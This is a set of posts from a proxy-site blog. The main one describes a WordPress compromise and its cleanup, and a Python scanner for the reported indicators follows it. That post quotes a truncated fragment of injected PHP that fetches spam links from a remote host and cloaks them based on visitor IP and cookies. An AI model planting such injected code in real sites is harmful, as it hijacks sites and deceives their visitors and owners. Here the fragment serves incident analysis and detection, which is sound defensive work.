Nov 30

Well, as you can see, the Web Proxy Blog is back online despite the best efforts of a particularly mean set of hacks, which we want to share with you, firstly to help you fix your problems and secondly to help prevent people making the same mistakes using WordPress that we did.

Firstly, this was a multiple hack across many different domains and blogs, though they all had a few things in common:

They were all run/updated from a computer that was infected with worms, backdoors, trojans and goodness knows what else. Keep your antivirus software up to date!

Secondly, they were all WordPress blogs that should have been updated. The oldest was version 2.0 and the latest was WP 2.6.3. We would have thought that the WordPress 2.6.3 and 2.5 installations would have been safe, but this hack is fairly new.

Finally, all the blogs were on Dreamhost. Could be a coincidence – we would be interested in hearing your comments.

The hacks manifested in a number of ways, but the blogs all looked fine in a browser while having dozens of hidden links at the bottom of each blog post. It’s only when I looked through the source code, or switched off the CSS, that the links could be seen. Most of the links were real estate or Lindsay Lohan screensavers or something!

Another thing that was noticeable was that there were strange new files and folders in the blogs, e.g.:
/blog/wp-includes/js/tinymce/themes/advanced/images/xp

In these directories I found files with strange filenames, e.g. 05417e755b378ea9a91fdbe7f71712ce. These files contained links that were appearing in the footer.

Another thing I noticed was that the wp-blog-header.php file was much larger than the original and had strange coding in it:

/* r_start */
$rurl="http://sattan.org/feed/search.php?q=";
$rkeys=array("buy tramadol","tramadol","tramadol online","soma","auto insurance","car insurance","backing up files","car insurance quote","auto insurance quotes","auto insurance company","auto insurance quote","fioricet","insurance quotes",…………………….. religion");
$ips=unserialize(base64_decode("YTo3OntpOjA7czoxMjoiODEuMTc3LjI2LjIwIjtpOjE7czoxMzoiNjYuMjQ5LjEzLjE1NiI7aToyO3M6MTM6IjY2LjI0OS4xNC4xNDQiO2k6MztzOjEzOiI2Ni4yNDkuMTQuMTQzIjtpOjY7czoxNDoiMjA5LjU5LjIwMS4yMzYiO2k6NztzOjEzOiI2Ni4yNDkuMTAuMTQyIjtpOjExO3M6MTE6IjcyLjI5Ljc0LjExIjt9"));
$_ip=false; if(is_array($ips)) foreach($ips as $ip) if($ip==$_SERVER['REMOTE_ADDR']){ $_ip=true; break; }
if(sizeof($_COOKIE)==0 && $_ip==false && ……………………..

………..
exit;

There was also some strange coding in the template footer.php file, with a 1,000-character-long Base64 string, that collected spam links from www.spamreport.ru.

I also found a backdoor file, remv.php, in the root of the WordPress themes directory.

Anyway, I didn’t fancy cleaning up that mess so I decided to make a backup via FTP, delete the old files and do a completely fresh WordPress install. The only problem was that the hack seemed to have changed the folder permissions from 755 to 555, which meant that we couldn’t delete our own files!

That was easy enough to fix by setting the attributes back to their proper value, but we did notice a few files and folders that had been modified to 777 (i.e. read/write/execute permission), confirming our suspicion that this was a mean hack and that the best way to fix it would be to delete everything and start with a fresh installation.

The good news is that once we had done this the blogs were back to normal, with the exception of the pre-WordPress 2.2 blogs that had their character set altered so that pound signs, foreign letters etc. were garbled with “Ä ±” or similar. Removing these two lines from the wp-config.php fixed this:

define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

You don’t need these two lines if you are upgrading from pre-WP 2.2 versions because the character sets are already built into the blog.

As a final precaution I reset the MySQL database table password and the WP admin password for good measure. We also reset the FTP password because I suspect this was a hack across so many levels that just about every one of my usernames and passwords has been compromised.

So, that’s how I spent most of my Sunday! Anyone have similar experiences, shortcuts etc. they want to share?
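The indicators described in this post (32-character hex filenames, the /* r_start */ marker and Base64 blobs in PHP files, remv.php, and 777 permissions) can be checked for in one pass over a WordPress directory. The script below is an added example, not code from the original post; the 200-character blob threshold, the function names and the sample tree are assumptions constructed for illustration.

```python
import os, re, stat, tempfile
from pathlib import Path

HEX_NAME = re.compile(r"[0-9a-f]{32}")           # names like 05417e755b378ea9a91fdbe7f71712ce
LONG_B64 = re.compile(rb"[A-Za-z0-9+/=]{200,}")  # assumed threshold for an embedded blob
MARKER = b"/* r_start */"                        # comment seen in the modified wp-blog-header.php
BAD_NAMES = {"remv.php"}                         # backdoor filename reported in the post

def scan(root):
    """Return sorted (relative_path, reason) findings under a WordPress root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel, mode = os.path.relpath(path, root), os.lstat(path).st_mode
            if stat.S_IMODE(mode) & 0o002 and not stat.S_ISLNK(mode):
                findings.append((rel, "world-writable"))
            if not stat.S_ISREG(mode):
                continue  # content checks apply to regular files only
            if HEX_NAME.fullmatch(name):
                findings.append((rel, "32-hex filename"))
            if name.lower() in BAD_NAMES:
                findings.append((rel, "known backdoor name"))
            if name.lower().endswith(".php"):
                data = Path(path).read_bytes()
                if MARKER in data:
                    findings.append((rel, "r_start marker"))
                if b"base64_decode" in data and LONG_B64.search(data):
                    findings.append((rel, "long base64 literal"))
    return sorted(findings)

def make_sample_tree():
    root = Path(tempfile.mkdtemp())
    files = {  # constructed, harmless stand-ins for the indicators in the post
        "index.php": b"<?php // clean file\n",
        "wp-blog-header.php": b'<?php /* r_start */ $x=base64_decode("' + b"QUJD" * 60 + b'");\n',
        "wp-includes/images/xp/05417e755b378ea9a91fdbe7f71712ce": b"<a href='#'>link</a>\n",
        "wp-content/themes/remv.php": b"<?php // placeholder, not a real backdoor\n",
    }
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(body)
        (root / rel).chmod(0o644)
    for dirpath, _, _ in os.walk(root):
        os.chmod(dirpath, 0o755)  # normalise, independent of the caller's umask
    (root / "wp-content" / "themes").chmod(0o777)  # mimic the 777 folders from the post
    return str(root)

if __name__ == "__main__":
    print(*scan(make_sample_tree()), sep="\n")
```

Run against a backup copy of the site rather than the live tree, and treat hits as leads to inspect by hand; a clean result does not prove the install is clean.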

May 11

Hey, it appears you have already subscribed to our Mailing List to get New Proxy Websites Daily

Thanks!

For those wondering, this is just a placeholder for when people try to sign up to our mailing list twice.

May 04

The idea is simple: write a blog post about us or link to us from your proxy site with the anchor text ‘Web Proxy’ and we’ll post a link to you from this site in a blog post.

Benefits for you:

  • A link that’s going to have some PR on the next update
  • Traffic to your website from our readers
  • More backlinks helping with your SEO

An example of your link could be:

Web Proxy Blog helps you earn money with proxies.

Once you’ve done that, you can either comment on a blog post letting us know where it is (an extra link for you) or you can email: 1@webproxyblog.com

“What are you waiting for?”

Apr 27

Due to the nature of the web and the legalities, I thought it’s in our best interest to take down our Google Proxy and our Yahoo Proxy due to possible copyright and trademark infringements, and they aren’t worth losing a Google Adsense account over. With that said, we have given a facelift to our http Proxy and our Live Proxy, so feel free to let us know what you think.

After having dealt with proxy changes, we feel that we’ve learned a bit about the design of proxies.

  • Have a unique favicon. I had the idea of having the same favicon for all the sites and even this blog, but if we want people to use and bookmark them all then the favicons should be unique.
  • Put attention into your logo; that’s what will help people remember the site and lets them know how much attention and care you have put into it, so keep it fresh.
  • Get some icons from the icon library if you need some ideas.

Apr 25

As the title seems to suggest, I think it’s better if we post our proxy revenues monthly instead of you guys guessing how much we are earning, along with our monthly traffic stats for all sites to make the monthly look at things a little more interesting. Hopefully you guys prefer it that way and I’m sure it will be a lot easier for us just posting income and traffic stats once per month instead of having to fill up a post just to mention that our best day so far is $2.50 (which is true).

I have started to remove all proxy topsites from the site to see how that affects traffic etc., which will be interesting, and have a few theories about making money with proxies that I’m going to try out. Thanks for reading!

Apr 14

Wow, for once the first blog post without a title such as Welcome to WebProxyBlog, but I find this title much more descriptive. Over the course of this blog you can follow us either making money or losing money on proxy sites; we are going to hold nothing back (there’s two of us by the way) as we build up our proxy network. Lose money or make it, banned from Adsense? Hosting issues? We’ll have it all, so you aren’t alone. We do the testing that you want to know the answers to and offer the advice on where our traffic comes from (exactly) and where our links come from. So why is this blog here? Well, that’s simple:

  1. To link to all our proxies and spread link love and traffic
  2. To optimise in order to not have to optimise each proxy, we are crazily trying to rank for Web Proxy
  3. Help you guys with your sites and learn from you guys from your comments on what we are doing
  4. Be 100% transparent about earnings, issues and technicalities that we might face or actually face

There’s so much to post already, but I’m going to work on a new design, or at least something different to the default WordPress look, link to our sites and get posting on how we set them all up, why we chose what we chose etc. and how we are building traffic. We hope that you will follow our journey and then decide whether making a proxy is good for you. There may be times we get lucky and you can’t replicate what we have got, or there may be times that we fell in a pitfall that some of you with proxies already avoided, which might slow us down, but it’s a learning curve for us as well. Being in Internet Marketing 24/7 for the last 18 months, I honestly believe we can build traffic and keep traffic whilst making money on a slim budget, if any at all; we will link to what we use, how we use it etc. I run ViperChill and will soon be announcing this site over there and on various forums; until then we have our proxies to set up and a WordPress theme to implement ;) .

Take care all